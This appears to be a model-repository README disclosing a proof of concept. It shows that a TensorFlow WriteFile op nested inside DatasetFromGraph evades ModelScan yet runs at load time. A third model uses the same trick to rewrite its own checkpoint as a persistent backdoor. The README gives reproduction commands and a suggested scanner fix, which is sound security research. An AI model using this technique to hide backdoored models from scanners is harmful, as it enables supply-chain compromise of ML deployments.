You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

Log in or Sign Up to review the conditions and access this model content.

YAML Metadata Warning:empty or missing yaml metadata in repo card

Check out the documentation for more information.

SavedModel scanner bypass via nested DatasetFromGraph WriteFile

Three SavedModels that demonstrate, in order, that ModelScan does flag WriteFile when it can see it, that nesting it inside DatasetFromGraph makes it invisible to ModelScan while still running at load, and that the same nesting technique can rewrite the model's own checkpoint and turn into a persistent backdoor.

One thing to be clear about up front. The top_level_writefile model is a control, not a finding. ModelScan flagging it as HIGH is the intended, healthy behaviour β€” it proves the scanner does detect WriteFile when it's visible. The actual bypass is nested_writefile, and the backdoor is self_poisoning_writefile. Both of those run the same load-time WriteFile and both pass ModelScan with zero issues.

Tested against the latest published versions of TensorFlow and ModelScan on PyPI (TensorFlow 2.21.0, ModelScan 0.8.8).

What's in the box

build_poc.py          rebuild all three SavedModels
verify_poc.py         run ModelScan + load each model + the self-poison
                      first/second-load differential, all in an isolated cwd
requirements.txt      pinned tensorflow and modelscan
sample_results.json   sanitised output from a passing run
models/
  top_level_writefile/        ordinary WriteFile in the top-level GraphDef
  nested_writefile/           same WriteFile hidden inside a nested GraphDef
  self_poisoning_writefile/   nested WriteFile that overwrites the model's
                              own variables/ checkpoint at load

What each case shows

top_level_writefile β€” control (not a finding)

This case exists to prove the baseline. The top-level GraphDef contains the WriteFile op directly. ModelScan 0.8.8 reports one HIGH issue with operator = WriteFile, and the model writes its marker file when loaded. The control passing is the expected outcome β€” it's the "ModelScan does detect WriteFile when it's visible" half of the differential. Without this case there's no way to say what the bypass is bypassing.

nested_writefile β€” bypass

Same WriteFile, same payload, same load-time effect. The only difference is location. The top-level GraphDef contains only Const, DatasetFromGraph, and DatasetToGraphV2. The WriteFile sits inside a serialised GraphDef carried as the bytes of a Const string tensor, and DatasetFromGraph consumes that string as a second parser root.

ModelScan walks the top-level nodes and the function library. It doesn't parse Const string tensors as nested GraphDefs, so the hidden WriteFile is invisible to it. The scan reports total_issues = 0. At load time TensorFlow traverses the inner graph through the TF1 legacy_init_op and runs the hidden write anyway.

saved_model_cli show --all is also blind to the nested op.

self_poisoning_writefile β€” persistent backdoor

A serving model with one variable w and signature y = x * w. The model ships with w = 2.0 on disk. The same nested DatasetFromGraph mechanism carries two hidden WriteFile nodes targeting relative paths variables/variables.data-00000-of-00001 and variables/variables.index. The contents are checkpoint bytes from a sibling template model built with w = 1337.0.

At first load:

  1. TF restores w = 2.0 from disk into memory.
  2. The legacy_init_op runs the hidden writes, which overwrite the on-disk checkpoint with the w = 1337.0 bytes.
  3. Inference still uses the in-memory w = 2.0, so y(3.0) = 6.0.

The model behaves correctly on this first load, which means a deployment pipeline that smoke-tests a model once and promotes it on success would see no anomaly.

On every load after that:

  1. TF restores w = 1337.0 from the now-poisoned checkpoint.
  2. Inference returns y(3.0) = 4011.0.

ModelScan reports the model clean for this case too.

Requirements

The pinned versions match the latest stable releases on PyPI at the time of writing.

python >= 3.10
tensorflow == 2.21.0   # latest on PyPI
modelscan == 0.8.8     # latest on PyPI

Install:

pip install -r requirements.txt

Reproducing the differential

The repo ships with the prebuilt models under models/. To verify all three cases:

python verify_poc.py

The verifier picks a fresh temp directory, runs ModelScan and saved_model_cli show --all on each model, then loads each model in a child Python process. For the marker cases the child cwd is set to the per-case workdir so the relative marker path resolves there. For the self-poisoning case, the model is copied into the workdir, the child cwd is set to the copied model directory, and the model is loaded twice with its variables/ hashes captured before, after the first load, and after the second load.

Expected output:

{
  "top_level_writefile": {
    "pass": true,
    "intent": "control: ModelScan is expected to detect top-level WriteFile",
    "top_level_has_writefile": true,
    "modelscan_total_issues": 1,
    "modelscan_flagged_writefile": true,
    "marker_written": true
  },
  "nested_writefile": {
    "pass": true,
    "intent": "bypass: ModelScan is expected to miss nested WriteFile, load is expected to run it anyway",
    "top_level_has_writefile": false,
    "nested_has_writefile": true,
    "modelscan_total_issues": 0,
    "modelscan_issues_empty": true,
    "marker_written": true
  },
  "self_poisoning_writefile": {
    "pass": true,
    "intent": "persistent backdoor: first load returns benign output, on-disk checkpoint is rewritten, second load returns attacker-chosen output",
    "top_level_has_writefile": false,
    "nested_has_writefile": true,
    "modelscan_total_issues": 0,
    "modelscan_issues_empty": true,
    "input": 3.0,
    "expected_benign_output": 6.0,
    "expected_poison_output": 4011.0,
    "first_load_output": 6.0,
    "second_load_output": 4011.0,
    "first_load_matches_benign": true,
    "second_load_matches_poison": true,
    "checkpoint_changed_after_first_load": true,
    "checkpoint_stable_after_second_load": true
  }
}

If you want to rebuild the models yourself before verifying:

python build_poc.py --overwrite
python verify_poc.py

If you want the loader to use a directory you choose instead of a temp directory:

python verify_poc.py --workdir ./scratch

After a run the marker cases leave files at:

./scratch/top_level_writefile/tfhunt_markers/top_level_writefile.txt
./scratch/nested_writefile/tfhunt_markers/nested_writefile.txt

Both contain tfhunt_writefile_payload\n.

The self-poisoning case leaves a copy of the model with the poisoned checkpoint at:

./scratch/self_poisoning_writefile/self_poisoning_writefile/

Reload that copy directly with tf.saved_model.load and you'll see y(3.0) = 4011.0 instead of the original 6.0.

Manual verification

If you don't want to trust verify_poc.py, each claim below can be checked with the stock tooling. Every step assumes your cwd is the repo root, and ends back there.

1. ModelScan flags the control, misses the bypass

modelscan scan -p ./models/top_level_writefile
modelscan scan -p ./models/nested_writefile

The first scan reports one HIGH issue with operator = WriteFile, which is the control behaving correctly. The second scan reports total_issues = 0 on a model that performs the same load-time write.

2. saved_model_cli is blind to the nested op

python -m tensorflow.python.tools.saved_model_cli show --dir ./models/nested_writefile --all

The relevant line in the output is:

The MetaGraph with tag set ['serve'] contains the following ops: {'Const', 'DatasetToGraphV2', 'DatasetFromGraph'}

No mention of WriteFile.

3. tf.saved_model.load runs the hidden write

The marker path baked into the model is relative, so the write lands wherever the loader's cwd is. Run the load in a clean working directory.

Linux / macOS:

mkdir manual_load && cd manual_load
python -c "import tensorflow as tf; tf.saved_model.load('../models/nested_writefile')"
ls tfhunt_markers
cat tfhunt_markers/nested_writefile.txt
cd ..

Windows PowerShell:

New-Item -ItemType Directory manual_load | Out-Null; Set-Location manual_load
python -c "import tensorflow as tf; tf.saved_model.load('../models/nested_writefile')"
Get-ChildItem tfhunt_markers
Get-Content tfhunt_markers\nested_writefile.txt
Set-Location ..

Expected file content:

tfhunt_writefile_payload

4. Self-poisoning rewrites the checkpoint on first load

The relative WriteFile targets are variables/..., so the load must run with cwd set to a copy of the model directory. The copy step is important β€” without it, the bundled model itself would get poisoned.

Linux / macOS:

cp -r models/self_poisoning_writefile manual_poison
cd manual_poison
sha256sum variables/variables.data-00000-of-00001
python -c "import tensorflow as tf; tf.saved_model.load('.')"
sha256sum variables/variables.data-00000-of-00001

Windows PowerShell:

Copy-Item -Recurse models/self_poisoning_writefile manual_poison
Set-Location manual_poison
Get-FileHash variables/variables.data-00000-of-00001 -Algorithm SHA256
python -c "import tensorflow as tf; tf.saved_model.load('.')"
Get-FileHash variables/variables.data-00000-of-00001 -Algorithm SHA256

The two hashes will differ. The on-disk checkpoint has been physically overwritten by the load.

5. Second load returns the attacker's weights

Stay in the manual_poison/ directory from step 4 and run the load again, this time invoking the serving signature:

python -c "import tensorflow as tf; loaded = tf.saved_model.load('.'); out = loaded.signatures['serving_default'](x=tf.constant(3.0)); print(float(next(iter(out.values())).numpy()))"

Expected output:

4011.0

The shipped model is y = x * w with w = 2.0, so a clean y(3.0) would be 6.0. After the load-time write in step 4 rewrote the checkpoint to w = 1337.0, the second load reads the poisoned weights and returns 4011.0. Return to the repo root with cd .. when done.

Troubleshooting

  • ModuleNotFoundError: No module named 'tensorflow' β€” TensorFlow isn't installed in the active environment. Run pip install -r requirements.txt from the repo root.
  • pip install resolution fails on modelscan β€” it needs Python 3.10-3.12. If the extras aren't pulled in, install with pip install 'modelscan[tensorflow,h5py]==0.8.8'.
  • Step 3's marker file doesn't appear β€” the cwd isn't where you think it is. Add import os; print(os.getcwd()) before the tf.saved_model.load call to confirm.
  • Step 5 still returns 6.0 β€” the cwd in step 4 wasn't the copied manual_poison directory, so nothing was poisoned. Copy the model again from the bundle (models/self_poisoning_writefile) and rerun step 4 with the new copy. Or just rebuild everything from scratch with python build_poc.py --overwrite.
  • saved_model_cli: command not found β€” it ships with TensorFlow but isn't always on PATH. Use the explicit form python -m tensorflow.python.tools.saved_model_cli show ....

Why this is interesting

ModelScan flags WriteFile as HIGH when it sees it in the top-level graph, so the operator is already on the unsafe list. The bypass isn't about the operator. It's about where it's allowed to hide.

The same idea generalises to any side-effecting op that TensorFlow will run from inside an inner dataset graph. WriteFile is the cleanest demonstration because it's already on ModelScan's denylist, which makes the top-level-vs-nested differential unambiguous.

The self-poisoning case turns that file-write primitive into a persistent output-manipulation backdoor that's hard to catch with a single-load smoke test, because the malicious output only appears on the second and later loads.

The hidden write also runs in tf.lite.TFLiteConverter.from_saved_model, tf2onnx.convert, TensorFlow Serving, and the NVIDIA Triton TensorFlow backend. Those tests live outside this PoC bundle to keep it small and auditable, but they use models built the same way.

Safety

These models do exactly two things you can't see in the top-level graph:

  • top_level_writefile and nested_writefile write tfhunt_writefile_payload\n to a relative path tfhunt_markers/<name>.txt, resolved against the loader's working directory.
  • self_poisoning_writefile overwrites two relative paths variables/variables.data-00000-of-00001 and variables/variables.index with the byte content of a w = 1337.0 template checkpoint. Because the verifier sets cwd to the copied model directory, those writes only touch the copy, not the bundled artifact.

None of the models reach for absolute paths, environment variables, network, credentials, or any other resource.

If you want to inspect the nested graphs yourself without loading the models, verify_poc.py's inspect_saved_model function parses the serialised inner GraphDefs and lists their nodes.

Suggested fix

The gap in modelscan.scanners.SavedModelTensorflowOpScan is that it walks GraphDef.node and the function library on the top-level MetaGraphDef but doesn't recurse into ops whose inputs are serialised GraphDef bytes. The fix is to treat those ops as parser roots.

Sketch of what the scan loop could look like:

NESTED_GRAPHDEF_OPS = {
    "DatasetFromGraph",   # ops that accept a serialised GraphDef in a string input
    "XlaCallModule",      # carries a serialised StableHLO / MLIR module
}

MAX_RECURSION_DEPTH = 4
MAX_INNER_BYTES = 10 * 1024 * 1024


def scan_graphdef(graph_def, depth=0):
    if depth > MAX_RECURSION_DEPTH:
        return
    for node in graph_def.node:
        if node.op in UNSAFE_OPERATORS:
            report_issue(node, depth=depth)
        if node.op in NESTED_GRAPHDEF_OPS:
            inner_bytes = resolve_const_string_input(node, "graph_def", graph_def)
            if inner_bytes is None or len(inner_bytes) > MAX_INNER_BYTES:
                continue
            inner = GraphDef()
            inner.ParseFromString(inner_bytes)
            scan_graphdef(inner, depth=depth + 1)
    for fn in graph_def.library.function:
        for node in fn.node_def:
            # Same walk as above, on the function library.
            ...

The bounded recursion depth and byte cap stop a malicious model from turning a recursive scan into a parser DoS.

The same logic would help any scanner that gates .pb files on a top-level op walk. For TensorFlow itself, documenting that any op carrying serialised IR (DatasetFromGraph, XlaCallModule, and so on) should be treated as a parser root by external scanners would help downstream tooling write fixes that cover all of them at once.

Files generated by a run

verify_poc.py writes:

  • verification.json next to the script. This contains absolute paths from your machine, so it's .gitignored and is not part of the shipped artifact.

build_poc.py writes:

  • models/top_level_writefile/saved_model.pb
  • models/nested_writefile/saved_model.pb
  • models/self_poisoning_writefile/saved_model.pb
  • models/self_poisoning_writefile/variables/variables.data-00000-of-00001
  • models/self_poisoning_writefile/variables/variables.index

The first two models have empty variables/ directories. That's expected for those graphs.

Environment used to validate

Python 3.12.3
tensorflow 2.21.0
modelscan 0.8.8
Windows host
Downloads last month
-
Inference Providers NEW
This model isn't deployed by any Inference Provider. πŸ™‹ Ask for provider support